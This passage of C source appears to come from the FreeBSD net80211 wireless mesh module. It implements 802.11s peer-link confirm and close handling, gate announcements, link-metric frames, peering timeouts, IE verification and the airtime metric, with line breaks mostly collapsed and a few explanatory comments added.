ni->ni_vap; struct ieee80211_meshpeer_ie ie; const struct ieee80211_meshpeer_ie *meshpeer; uint16_t args[3]; /* +2+2+2+2 for action + code + capabilites + status code + AID */ meshpeer = mesh_parse_meshpeering_action(ni, wh, frm+2+2+2+2, efrm, &ie, IEEE80211_ACTION_MESHPEERING_CONFIRM); if (meshpeer == NULL) { return 0; } IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "recv PEER CONFIRM, local id 0x%x, peer id 0x%x", meshpeer->peer_llinkid, meshpeer->peer_linkid); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_OPENRCV: mesh_linkchange(ni, IEEE80211_NODE_MESH_ESTABLISHED); mesh_peer_timeout_stop(ni); break; case IEEE80211_NODE_MESH_OPENSNT: mesh_linkchange(ni, IEEE80211_NODE_MESH_CONFIRMRCV); 
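		/*
		 * Our OPEN has been confirmed but the peer's own OPEN has not
		 * arrived yet: wait in CONFIRMRCV, with the timeout armed
		 * below, until mesh_recv_action_meshpeering_open() completes
		 * the handshake and moves the link to ESTABLISHED.
		 */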
mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_HOLDING: args[0] = ni->ni_mlpid; args[1] = meshpeer->peer_llinkid; /* Standard not clear about what the reason code should be */ args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); break; case IEEE80211_NODE_MESH_CONFIRMRCV: if (ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); } break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "received confirm in invalid state %d", ni->ni_mlstate); vap->iv_stats.is_rx_mgtdiscard++; break; } return 0; } static int mesh_recv_action_meshpeering_close(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211_meshpeer_ie ie; const struct ieee80211_meshpeer_ie *meshpeer; uint16_t args[3]; /* +2 for action + code */ meshpeer = mesh_parse_meshpeering_action(ni, wh, frm+2, efrm, &ie, IEEE80211_ACTION_MESHPEERING_CLOSE); if (meshpeer == NULL) { return 0; } /* * XXX: check reason code, for example we could receive * IEEE80211_REASON_MESH_MAX_PEERS then we should not attempt * to peer again. */ IEEE80211_NOTE(ni->ni_vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "%s", "recv PEER CLOSE"); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: /* ignore */ break; case IEEE80211_NODE_MESH_OPENRCV: case IEEE80211_NODE_MESH_OPENSNT: case IEEE80211_NODE_MESH_CONFIRMRCV: case IEEE80211_NODE_MESH_ESTABLISHED: args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_MESH_CLOSE_RCVD; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_HOLDING: mesh_linkchange(ni, IEEE80211_NODE_MESH_IDLE); mesh_peer_timeout_stop(ni); break; } return 0; } /* * Link Metric handling. */ static int mesh_recv_action_meshlmetric(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { const struct ieee80211_meshlmetric_ie *ie = (const struct ieee80211_meshlmetric_ie *) (frm+2); /* action + code */ struct ieee80211_meshlmetric_ie lm_rep; if (ie->lm_flags & IEEE80211_MESH_LMETRIC_FLAGS_REQ) { lm_rep.lm_flags = 0; lm_rep.lm_metric = mesh_airtime_calc(ni); ieee80211_send_action(ni, IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_LMETRIC, &lm_rep); } /* XXX: else do nothing for now */ return 0; } /* * Parse meshgate action ie's for GANN frames. * Returns -1 if parsing fails, otherwise 0. 
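 * (Editorial addition.) The routine walks the information elements in
 * frm..efrm, length-checking each one, and copies the fields of the
 * Mesh Gate Announcement element it finds into *ie, converting the
 * sequence number and interval from little-endian wire order.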
*/ static int mesh_parse_meshgate_action(struct ieee80211_node *ni, const struct ieee80211_frame *wh, /* XXX for VERIFY_LENGTH */ struct ieee80211_meshgann_ie *ie, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; const struct ieee80211_meshgann_ie *gannie; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return -1); switch (*frm) { case IEEE80211_ELEMID_MESHGANN: gannie = (const struct ieee80211_meshgann_ie *) frm; memset(ie, 0, sizeof(*ie)); ie->gann_ie = gannie->gann_ie; ie->gann_len = gannie->gann_len; ie->gann_flags = gannie->gann_flags; ie->gann_hopcount = gannie->gann_hopcount; ie->gann_ttl = gannie->gann_ttl; IEEE80211_ADDR_COPY(ie->gann_addr, gannie->gann_addr); ie->gann_seq = LE_READ_4(&gannie->gann_seq); ie->gann_interval = LE_READ_2(&gannie->gann_interval); break; } frm += frm[1] + 2; } return 0; } /* * Mesh Gate Announcement handling. */ static int mesh_recv_action_meshgate(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_gate_route *gr, *next; struct ieee80211_mesh_route *rt_gate; struct ieee80211_meshgann_ie pgann; struct ieee80211_meshgann_ie ie; int found = 0; /* +2 for action + code */ if (mesh_parse_meshgate_action(ni, wh, &ie, frm+2, efrm) != 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "%s", "GANN parsing failed"); vap->iv_stats.is_rx_mgtdiscard++; return (0); } if (IEEE80211_ADDR_EQ(vap->iv_myaddr, ie.gann_addr)) return 0; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, "received GANN, meshgate: %6D (seq %u)", ie.gann_addr, ":", ie.gann_seq); if (ms == NULL) return (0); MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(gr, &ms->ms_known_gates, gr_next, next) { if (!IEEE80211_ADDR_EQ(gr->gr_addr, ie.gann_addr)) continue; if (ie.gann_seq <= gr->gr_lastseq) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "GANN old seqno %u <= %u", ie.gann_seq, gr->gr_lastseq); MESH_RT_UNLOCK(ms); return (0); } /* corresponding mesh gate found & GANN accepted */ found = 1; break; } if (found == 0) { /* this GANN is from a new mesh Gate add it to known table. 
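 * XXX editorial note: the malloc() below uses M_NOWAIT and the result
 * is not checked for NULL before it is dereferenced.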
*/ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, ie.gann_addr, "stored new GANN information, seq %u.", ie.gann_seq); gr = malloc(ALIGN(sizeof(struct ieee80211_mesh_gate_route)), M_80211_MESH_GT_RT, M_NOWAIT | M_ZERO); IEEE80211_ADDR_COPY(gr->gr_addr, ie.gann_addr); TAILQ_INSERT_TAIL(&ms->ms_known_gates, gr, gr_next); } gr->gr_lastseq = ie.gann_seq; /* check if we have a path to this gate */ rt_gate = mesh_rt_find_locked(ms, gr->gr_addr); if (rt_gate != NULL && rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) { gr->gr_route = rt_gate; rt_gate->rt_flags |= IEEE80211_MESHRT_FLAGS_GATE; } MESH_RT_UNLOCK(ms); /* propagate only if decremented ttl >= 1 && forwarding is enabled */ if ((ie.gann_ttl - 1) < 1 && !(ms->ms_flags & IEEE80211_MESHFLAGS_FWD)) return 0; pgann.gann_flags = ie.gann_flags; /* Reserved */ pgann.gann_hopcount = ie.gann_hopcount + 1; pgann.gann_ttl = ie.gann_ttl - 1; IEEE80211_ADDR_COPY(pgann.gann_addr, ie.gann_addr); pgann.gann_seq = ie.gann_seq; pgann.gann_interval = ie.gann_interval; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, ie.gann_addr, "%s", "propagate GANN"); ieee80211_send_action(vap->iv_bss, IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, &pgann); return 0; } static int mesh_send_action(struct ieee80211_node *ni, const uint8_t sa[IEEE80211_ADDR_LEN], const uint8_t da[IEEE80211_ADDR_LEN], struct mbuf *m) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_bpf_params params; struct ieee80211_frame *wh; int ret; KASSERT(ni != NULL, ("null node")); if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT, ni, "block %s frame in CAC state", "Mesh action"); vap->iv_stats.is_tx_badstate++; ieee80211_free_node(ni); m_freem(m); return EIO; /* XXX */ } M_PREPEND(m, sizeof(struct ieee80211_frame), M_DONTWAIT); if (m == NULL) { ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ACTION, IEEE80211_NONQOS_TID, sa, da, sa); m->m_flags |= M_ENCAP; /* mark encapsulated */ memset(&params, 0, sizeof(params)); params.ibp_pri = WME_AC_VO; params.ibp_rate0 = ni->ni_txparms->mgmtrate; if (IEEE80211_IS_MULTICAST(da)) params.ibp_try0 = 1; else params.ibp_try0 = ni->ni_txparms->maxretry; params.ibp_power = ni->ni_txpower; IEEE80211_NODE_STAT(ni, tx_mgmt); ret = ieee80211_raw_output(vap, ni, m, &params); IEEE80211_TX_UNLOCK(ic); return (ret); } #define ADDSHORT(frm, v) do { \ frm[0] = (v) & 0xff; \ frm[1] = (v) >> 8; \ frm += 2; \ } while (0) #define ADDWORD(frm, v) do { \ frm[0] = (v) & 0xff; \ frm[1] = ((v) >> 8) & 0xff; \ frm[2] = ((v) >> 16) & 0xff; \ frm[3] = ((v) >> 24) & 0xff; \ frm += 4; \ } while (0) static int mesh_send_action_meshpeering_open(struct ieee80211_node *ni, int category, int action, void *args0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; uint16_t *args = args0; const struct ieee80211_rateset *rs; struct mbuf *m; uint8_t *frm; IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send PEER OPEN action: localid 0x%x", args[0]); IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) /* action+category */ + sizeof(uint16_t) /* capabilities */ + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - 
IEEE80211_RATE_SIZE) + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshconf_ie) + sizeof(struct ieee80211_meshpeer_ie) ); if (m != NULL) { /* * mesh peer open action frame format: * [1] category * [1] action * [2] capabilities * [tlv] rates * [tlv] xrates * [tlv] mesh id * [tlv] mesh conf * [tlv] mesh peer link mgmt */ *frm++ = category; *frm++ = action; ADDSHORT(frm, ieee80211_getcapinfo(vap, ni->ni_chan)); rs = ieee80211_get_suprates(ic, ic->ic_curchan); frm = ieee80211_add_rates(frm, rs); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshconf(frm, vap); frm = ieee80211_add_meshpeer(frm, IEEE80211_ACTION_MESHPEERING_OPEN, args[0], 0, 0); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshpeering_confirm(struct ieee80211_node *ni, int category, int action, void *args0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; uint16_t *args = args0; const struct ieee80211_rateset *rs; struct mbuf *m; uint8_t *frm; IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send PEER CONFIRM action: localid 0x%x, peerid 0x%x", args[0], args[1]); IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) /* action+category */ + sizeof(uint16_t) /* capabilites */ + sizeof(uint16_t) /* status code */ + sizeof(uint16_t) /* AID */ + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshconf_ie) + sizeof(struct ieee80211_meshpeer_ie) ); if (m != NULL) { /* * mesh peer confirm action frame format: * [1] category * [1] action * [2] capabilities * [2] status code * [2] association id (peer ID) * [tlv] rates * [tlv] xrates * [tlv] mesh id * [tlv] mesh conf * [tlv] mesh peer link mgmt */ *frm++ = category; *frm++ = action; ADDSHORT(frm, ieee80211_getcapinfo(vap, ni->ni_chan)); ADDSHORT(frm, 0); /* status code */ ADDSHORT(frm, args[1]); /* AID */ rs = ieee80211_get_suprates(ic, ic->ic_curchan); frm = ieee80211_add_rates(frm, rs); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshconf(frm, vap); frm = ieee80211_add_meshpeer(frm, IEEE80211_ACTION_MESHPEERING_CONFIRM, args[0], args[1], 0); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshpeering_close(struct ieee80211_node *ni, int category, int action, void *args0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; uint16_t *args = args0; struct mbuf *m; uint8_t *frm; IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send PEER CLOSE action: localid 0x%x, peerid 0x%x reason %d", args[0], args[1], args[2]); IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) /* 
action+category */ + sizeof(uint16_t) /* reason code */ + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshpeer_ie) ); if (m != NULL) { /* * mesh peer close action frame format: * [1] category * [1] action * [tlv] mesh id * [tlv] mesh peer link mgmt */ *frm++ = category; *frm++ = action; frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshpeer(frm, IEEE80211_ACTION_MESHPEERING_CLOSE, args[0], args[1], args[2]); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshlmetric(struct ieee80211_node *ni, int category, int action, void *arg0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_meshlmetric_ie *ie = arg0; struct mbuf *m; uint8_t *frm; if (ie->lm_flags & IEEE80211_MESH_LMETRIC_FLAGS_REQ) { IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "%s", "send LINK METRIC REQUEST action"); } else { IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send LINK METRIC REPLY action: metric 0x%x", ie->lm_metric); } IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + /* action+category */ sizeof(struct ieee80211_meshlmetric_ie) ); if (m != NULL) { /* * mesh link metric * [1] category * [1] action * [tlv] mesh link metric */ *frm++ = category; *frm++ = action; frm = ieee80211_add_meshlmetric(frm, ie->lm_flags, ie->lm_metric); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshgate(struct ieee80211_node *ni, int category, int action, void *arg0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_meshgann_ie *ie = arg0; struct mbuf *m; uint8_t *frm; IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + /* action+category */ IEEE80211_MESHGANN_BASE_SZ ); if (m != NULL) { /* * mesh gate announcement * [1] category * [1] action * [tlv] mesh gate announcement */ *frm++ = category; *frm++ = action; frm = ieee80211_add_meshgate(frm, ie); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, broadcastaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static void mesh_peer_timeout_setup(struct ieee80211_node *ni) { switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_HOLDING: ni->ni_mltval = ieee80211_mesh_holdingtimeout; break; case IEEE80211_NODE_MESH_CONFIRMRCV: ni->ni_mltval = ieee80211_mesh_confirmtimeout; break; case IEEE80211_NODE_MESH_IDLE: ni->ni_mltval = 0; break; default: ni->ni_mltval = ieee80211_mesh_retrytimeout; break; } if (ni->ni_mltval) callout_reset(&ni->ni_mltimer, ni->ni_mltval, mesh_peer_timeout_cb, ni); } /* * Same as above but backs off the timer statistically by 50%. 
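 * (Editorial addition.) arc4random() % ni_mltval below adds a uniform
 * 0..(ni_mltval-1) ticks to the current value, i.e. roughly a 50%
 * increase on average, which helps keep the two ends of the link from
 * retrying in lockstep.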
*/ static void mesh_peer_timeout_backoff(struct ieee80211_node *ni) { uint32_t r; r = arc4random(); ni->ni_mltval += r % ni->ni_mltval; callout_reset(&ni->ni_mltimer, ni->ni_mltval, mesh_peer_timeout_cb, ni); } static __inline void mesh_peer_timeout_stop(struct ieee80211_node *ni) { callout_drain(&ni->ni_mltimer); } static void mesh_peer_backoff_cb(void *arg) { struct ieee80211_node *ni = (struct ieee80211_node *)arg; /* After backoff timeout, try to peer automatically again. */ ni->ni_mlhcnt = 0; } /* * Mesh Peer Link Management FSM timeout handling. */ static void mesh_peer_timeout_cb(void *arg) { struct ieee80211_node *ni = (struct ieee80211_node *)arg; uint16_t args[3]; IEEE80211_NOTE(ni->ni_vap, IEEE80211_MSG_MESH, ni, "mesh link timeout, state %d, retry counter %d", ni->ni_mlstate, ni->ni_mlrcnt); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: case IEEE80211_NODE_MESH_ESTABLISHED: break; case IEEE80211_NODE_MESH_OPENSNT: case IEEE80211_NODE_MESH_OPENRCV: if (ni->ni_mlrcnt == ieee80211_mesh_maxretries) { args[0] = ni->ni_mlpid; args[2] = IEEE80211_REASON_MESH_MAX_RETRIES; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); ni->ni_mlrcnt = 0; mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); } else { args[0] = ni->ni_mlpid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, args); ni->ni_mlrcnt++; mesh_peer_timeout_backoff(ni); } break; case IEEE80211_NODE_MESH_CONFIRMRCV: args[0] = ni->ni_mlpid; args[2] = IEEE80211_REASON_MESH_CONFIRM_TIMEOUT; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_HOLDING: ni->ni_mlhcnt++; if (ni->ni_mlhcnt >= ieee80211_mesh_maxholding) callout_reset(&ni->ni_mlhtimer, ieee80211_mesh_backofftimeout, mesh_peer_backoff_cb, ni); mesh_linkchange(ni, IEEE80211_NODE_MESH_IDLE); break; } } static int mesh_verify_meshid(struct ieee80211vap *vap, const uint8_t *ie) { struct ieee80211_mesh_state *ms = vap->iv_mesh; if (ie == NULL || ie[1] != ms->ms_idlen) return 1; return memcmp(ms->ms_id, ie + 2, ms->ms_idlen); } /* * Check if we are using the same algorithms for this mesh. 
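 * (Editorial addition.) Returns 0 when the received Mesh Configuration
 * IE matches our active path selection, link metric, congestion
 * control, synchronization and authentication IDs and the peer is
 * still accepting peers; non-zero otherwise.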
*/ static int mesh_verify_meshconf(struct ieee80211vap *vap, const uint8_t *ie) { const struct ieee80211_meshconf_ie *meshconf = (const struct ieee80211_meshconf_ie *) ie; const struct ieee80211_mesh_state *ms = vap->iv_mesh; if (meshconf == NULL) return 1; if (meshconf->conf_pselid != ms->ms_ppath->mpp_ie) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown path selection algorithm: 0x%x\n", meshconf->conf_pselid); return 1; } if (meshconf->conf_pmetid != ms->ms_pmetric->mpm_ie) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown path metric algorithm: 0x%x\n", meshconf->conf_pmetid); return 1; } if (meshconf->conf_ccid != 0) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown congestion control algorithm: 0x%x\n", meshconf->conf_ccid); return 1; } if (meshconf->conf_syncid != IEEE80211_MESHCONF_SYNC_NEIGHOFF) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown sync algorithm: 0x%x\n", meshconf->conf_syncid); return 1; } if (meshconf->conf_authid != 0) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown auth auth algorithm: 0x%x\n", meshconf->conf_pselid); return 1; } /* Not accepting peers */ if (!(meshconf->conf_cap & IEEE80211_MESHCONF_CAP_AP)) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "not accepting peers: 0x%x\n", meshconf->conf_cap); return 1; } return 0; } static int mesh_verify_meshpeer(struct ieee80211vap *vap, uint8_t subtype, const uint8_t *ie) { const struct ieee80211_meshpeer_ie *meshpeer = (const struct ieee80211_meshpeer_ie *) ie; if (meshpeer == NULL || meshpeer->peer_len < IEEE80211_MPM_BASE_SZ || meshpeer->peer_len > IEEE80211_MPM_MAX_SZ) return 1; if (meshpeer->peer_proto != IEEE80211_MPPID_MPM) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, "Only MPM protocol is supported (proto: 0x%02X)", meshpeer->peer_proto); return 1; } switch (subtype) { case IEEE80211_ACTION_MESHPEERING_OPEN: if (meshpeer->peer_len != IEEE80211_MPM_BASE_SZ) return 1; break; case IEEE80211_ACTION_MESHPEERING_CONFIRM: if (meshpeer->peer_len != IEEE80211_MPM_BASE_SZ + 2) return 1; break; case IEEE80211_ACTION_MESHPEERING_CLOSE: if (meshpeer->peer_len < IEEE80211_MPM_BASE_SZ + 2) return 1; if (meshpeer->peer_len == (IEEE80211_MPM_BASE_SZ + 2) && meshpeer->peer_linkid != 0) return 1; if (meshpeer->peer_rcode == 0) return 1; break; } return 0; } /* * Add a Mesh ID IE to a frame. */ uint8_t * ieee80211_add_meshid(uint8_t *frm, struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; KASSERT(vap->iv_opmode == IEEE80211_M_MBSS, ("not a mbss vap")); *frm++ = IEEE80211_ELEMID_MESHID; *frm++ = ms->ms_idlen; memcpy(frm, ms->ms_id, ms->ms_idlen); return frm + ms->ms_idlen; } /* * Add a Mesh Configuration IE to a frame. * For now just use HWMP routing, Airtime link metric, Null Congestion * Signaling, Null Sync Protocol and Null Authentication. */ uint8_t * ieee80211_add_meshconf(uint8_t *frm, struct ieee80211vap *vap) { const struct ieee80211_mesh_state *ms = vap->iv_mesh; uint16_t caps; KASSERT(vap->iv_opmode == IEEE80211_M_MBSS, ("not a MBSS vap")); *frm++ = IEEE80211_ELEMID_MESHCONF; *frm++ = IEEE80211_MESH_CONF_SZ; *frm++ = ms->ms_ppath->mpp_ie; /* path selection */ *frm++ = ms->ms_pmetric->mpm_ie; /* link metric */ *frm++ = IEEE80211_MESHCONF_CC_DISABLED; *frm++ = IEEE80211_MESHCONF_SYNC_NEIGHOFF; *frm++ = IEEE80211_MESHCONF_AUTH_DISABLED; /* NB: set the number of neighbors before the rest */ *frm = (ms->ms_neighbors > IEEE80211_MESH_MAX_NEIGHBORS ? 
IEEE80211_MESH_MAX_NEIGHBORS : ms->ms_neighbors) << 1; if (ms->ms_flags & IEEE80211_MESHFLAGS_GATE) *frm |= IEEE80211_MESHCONF_FORM_GATE; frm += 1; caps = 0; if (ms->ms_flags & IEEE80211_MESHFLAGS_AP) caps |= IEEE80211_MESHCONF_CAP_AP; if (ms->ms_flags & IEEE80211_MESHFLAGS_FWD) caps |= IEEE80211_MESHCONF_CAP_FWRD; *frm++ = caps; return frm; } /* * Add a Mesh Peer Management IE to a frame. */ uint8_t * ieee80211_add_meshpeer(uint8_t *frm, uint8_t subtype, uint16_t localid, uint16_t peerid, uint16_t reason) { KASSERT(localid != 0, ("localid == 0")); *frm++ = IEEE80211_ELEMID_MESHPEER; switch (subtype) { case IEEE80211_ACTION_MESHPEERING_OPEN: *frm++ = IEEE80211_MPM_BASE_SZ; /* length */ ADDSHORT(frm, IEEE80211_MPPID_MPM); /* proto */ ADDSHORT(frm, localid); /* local ID */ break; case IEEE80211_ACTION_MESHPEERING_CONFIRM: KASSERT(peerid != 0, ("sending peer confirm without peer id")); *frm++ = IEEE80211_MPM_BASE_SZ + 2; /* length */ ADDSHORT(frm, IEEE80211_MPPID_MPM); /* proto */ ADDSHORT(frm, localid); /* local ID */ ADDSHORT(frm, peerid); /* peer ID */ break; case IEEE80211_ACTION_MESHPEERING_CLOSE: if (peerid) *frm++ = IEEE80211_MPM_MAX_SZ; /* length */ else *frm++ = IEEE80211_MPM_BASE_SZ + 2; /* length */ ADDSHORT(frm, IEEE80211_MPPID_MPM); /* proto */ ADDSHORT(frm, localid); /* local ID */ if (peerid) ADDSHORT(frm, peerid); /* peer ID */ ADDSHORT(frm, reason); break; } return frm; } /* * Compute an Airtime Link Metric for the link with this node. * * Based on Draft 3.0 spec (11B.10, p.149). */ /* * Max 802.11s overhead. */ #define IEEE80211_MESH_MAXOVERHEAD \ (sizeof(struct ieee80211_qosframe_addr4) \ + sizeof(struct ieee80211_meshcntl_ae10) \ + sizeof(struct llc) \ + IEEE80211_ADDR_LEN \ + IEEE80211_WEP_IVLEN \ + IEEE80211_WEP_KIDLEN \ + IEEE80211_WEP_CRCLEN \ + IEEE80211_WEP_MICLEN \ + IEEE80211_CRC_LEN) uint32_t mesh_airtime_calc(struct ieee80211_node *ni) { #define M_BITS 8 #define S_FACTOR (2 * M_BITS) struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ni->ni_vap->iv_ifp; const static int nbits = 8192 << M_BITS; uint32_t overhead, rate, errrate; uint64_t res; /* Time to transmit a frame */ rate = ni->ni_txrate; overhead = ieee80211_compute_duration(ic->ic_rt, ifp->if_mtu + IEEE80211_MESH_MAXOVERHEAD, rate, 0) << M_BITS; /* Error rate in percentage */ /* XXX assuming small failures are ok */ errrate = (((ifp->if_oerrors + ifp->if_ierrors) / 100) << M_BITS) / 100; res = (overhead + (nbits / rate)) * ((1 << S_FACTOR) / ((1 << M_BITS) - errrate)); return (uint32_t)(res >> S_FACTOR); #undef M_BITS #undef S_FACTOR } /* * Add a Mesh Link Metric report IE to a frame. */ uint8_t * ieee80211_add_meshlmetric(uint8_t *frm, uint8_t flags, uint32_t metric) { *frm++ = IEEE80211_ELEMID_MESHLINK; *frm++ = 5; *frm++ = flags; ADDWORD(frm, metric); return frm; } /* * Add a Mesh Gate Announcement IE to a frame. */ uint8_t * ieee80211_add_meshgate(uint8_t *frm, struct ieee80211_meshgann_ie *ie) { 